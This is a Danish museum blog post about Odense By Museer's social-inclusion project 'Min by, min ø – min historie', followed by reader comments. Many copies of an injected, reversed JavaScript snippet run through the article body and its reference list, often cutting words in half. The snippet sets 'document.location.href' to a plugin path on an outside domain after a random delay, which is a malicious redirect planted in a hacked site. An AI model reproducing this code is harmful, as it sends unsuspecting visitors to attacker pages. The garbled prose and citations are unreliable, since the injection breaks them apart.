Ved Odense By Museer har vi, i samarbejde med Knowledge Lab fra Syddansk Universitet, igangsat et projekt ”Min by, min ø – min histoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torie”, hvor vi via dialog med repræsentanter fra forskellige grupper af byens borgere ønsker at sætte fokus på deres forhold til museer og kulturarv, med henblik på at lade udviklingen af fremtidens museum tage afsæt i borgernes ønsker og behov. Vi ønsker med andre ord at sætte brugerne og især ikke-brugerne (herunder de kulturelt ekskluderede) i centrum, for med afsæt i deres virkelighed, at kunne iværksætte en udvikling, der skal fremme Odense Bys Museers ambition om at etablere sig som en lærende institution i en samfundsmæssig kontekst. Vi har således taget de første skridt i retningen af at etablere en ny indsigt og en derpå følgende inddragelse af deltagerne i museernes arbejde. Vi lærer, mens vi gennemfører projektet og vil derfor gerne dele vores overvejelser og erfaringer med andre.
Vores afsæt har været at tage fat i begreber som ”New Audience Development” og ”Social Inclusion”, der er blevet, eller er på vej til at blive, en del af museernes tankegang omkring og planlægning af forskellige tilbud og aktiviteter. Mens hovedsigtet med ”New Audience Development” er at udvide museernes brugergruppe via forskellige strategier, herunder Outreach, handler det i ”Social inclusion” grundlæggende om, at bekæmpe det der siden 1970erne har været dækket af begrebet ”social exclusion”. Begrebet kan vel bedst defineres som de dynamiske processer, der knytter sig til at være helt eller delvist udelukket fra de sociale, økonomiske, politiske og kulturelle forhold, der determinerer et menneskes sociale integration i samfundet.
I ”New Audience Development” arbejdes der med at fremme adgangen til kulturlivet for befolkningsgrupper med anden religiøs, etnisk og/eller kulturel baggrund. Når det gælder ”Social inclusion”, er målsætningen i højere grad at styrke deltagernes evne til at tage hånd om egne livsbetingelser og skabe positive forandringer i såvel deres egne liv, som i de miljøer og kulturer de færdes i. Selvom de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to tilganges målsætninger er henholdsvis kulturelt og socialt forankrede, har de en del til fælles, og overlapper ofte hinanden. Dette gør sig især gældende vedrørende den social inclusion-strategi den britiske museumsforsker Richard Sandell kalder ”The inclusive Museum”. Her arbejdes der med at eliminere de fysiske, geografiske, økonomiske, psykologiske og intellektuelle barrierer, der hindrer nogle grupper af mennesker i at anvende museernes tilbud. Hensigten er, at skabe grobund for en følelse af at være kulturelt inkluderet ved, at udvikle museer, hvis form og indhold appellerer til de grupper af kulturelt ekskluderede mennesker man retter tiltagene mod. For at iværksætte en sådan udvikling er man nødt til, at erhverve sig kendskab til de behov, ønsker, læringspræferencer og livsbetingelser der karakteriserer de kulturelt ekskluderede deltageres tilværelse. Hvordan dette bedst gøres er første udfordring på vejen mod det inkluderende museum. Det er samtidig et glimrende afsæt for den løbende debat omkring social inclusion som en del af de danske museers strategi, som vi håber at sparke i gang med denne blog. Ordet er frit.
I næste indlæg på bloggen vil vi beskæftige os med hvad projektet omfatter, og hvordan vi vil involvere borgerne i forløbet.
Kilder:
Kawashima, Nobuko (2006). Audience development and social inclusion in Britain. International Journal of Cultural Policy, Vol. 12, No. 1, 2006
Sandell, Richard (2003). Social Inclusion, the museum and the dynamics of sectoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toral change. Museum and society 1, 42-64
Sandell, Richard (1998). Museums as Agents of Social Inclusion. Museum Management and Curatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torship, Vol. 17, No. 4, pp. 401–418, 1998
Hvor det lyder spændende! Glæder mig til at følge jeres blog–indlæg. Har I mon også Nina Simons “The Participatory Museum” med som inspirationsmateriale?
Nina Simon er ikke sådan at komme uden om for øjeblikket :). Hendes tanker omkring udvikling af sociale platforme er en helt central inspirationskilde i forhold til vores arbejde med at skabe en digital platform, hvor brugernes arbejde i projektets anden etape kan publiceres og diskuteres. Jeg er sikker på vi kommer nærmere ind på den del af projektet på et senere tidspunkt 😉
Det lyder meget spændende, og jeg ser også frem til at følge kommende updates om jeres projekt.
Jeg kom til at tænke på en ting ifht. dit indlæg: har I overvejet også at undersøge, hvad museumsinstitutionen (det fysiske sted) betyder for interessen i kulturarv og lysten til at bruge den? Dét, jeg tænker på er, at der i dag er en vrimmel af andre “kulturarvsudbydere”; andre institutioner, foreninger, kommercielle, digitale etc. end for blot 20 – 25 år siden. Man kan sagtens være interesseret i kulturarv og historie, og dyrke sin interesse, uden at gå på museum.
Museumsinstitutionen som fysisk sted er omdrejningspunktet for anden del af “Min by, min ø – min historie”, hvor vi sætter fokus på Møntergården som socialt rum, og lader en gruppe ikke-brugere “indtage” en del af museets område. Helt konkret har vi inviteret en gruppe af byens graffitikunstnere til at reflektere over og diskutere museets rolle og funktion gennem værker de maler på plankeværket, der omgiver byggegrunden for museets tilbygning. Værkerne præsenteres ved et releaseparty på museet i forbindelse med kulturnatten i Odense i september. Begge disse aspekter ved projektet organiseres og afvikles primært af brugerne selv.
Lyder som et super spændende projekt, glæder mig til at følge med.
Minder mig en del om et projekt David Fleming lavede i Liverpool for et par år siden http://issuu.com/guywoodland/docs/slb “Superlambbanana”
Og ja helt i Richards tråd omkring outreach og the inclusive museum.
Så sættes der fokus på “Plankeværket”, der er anden del af “Min by, min ø – min historie”:
http://www.formidlingsnet.dk/min-by-min-o-min-historie-plankevaerket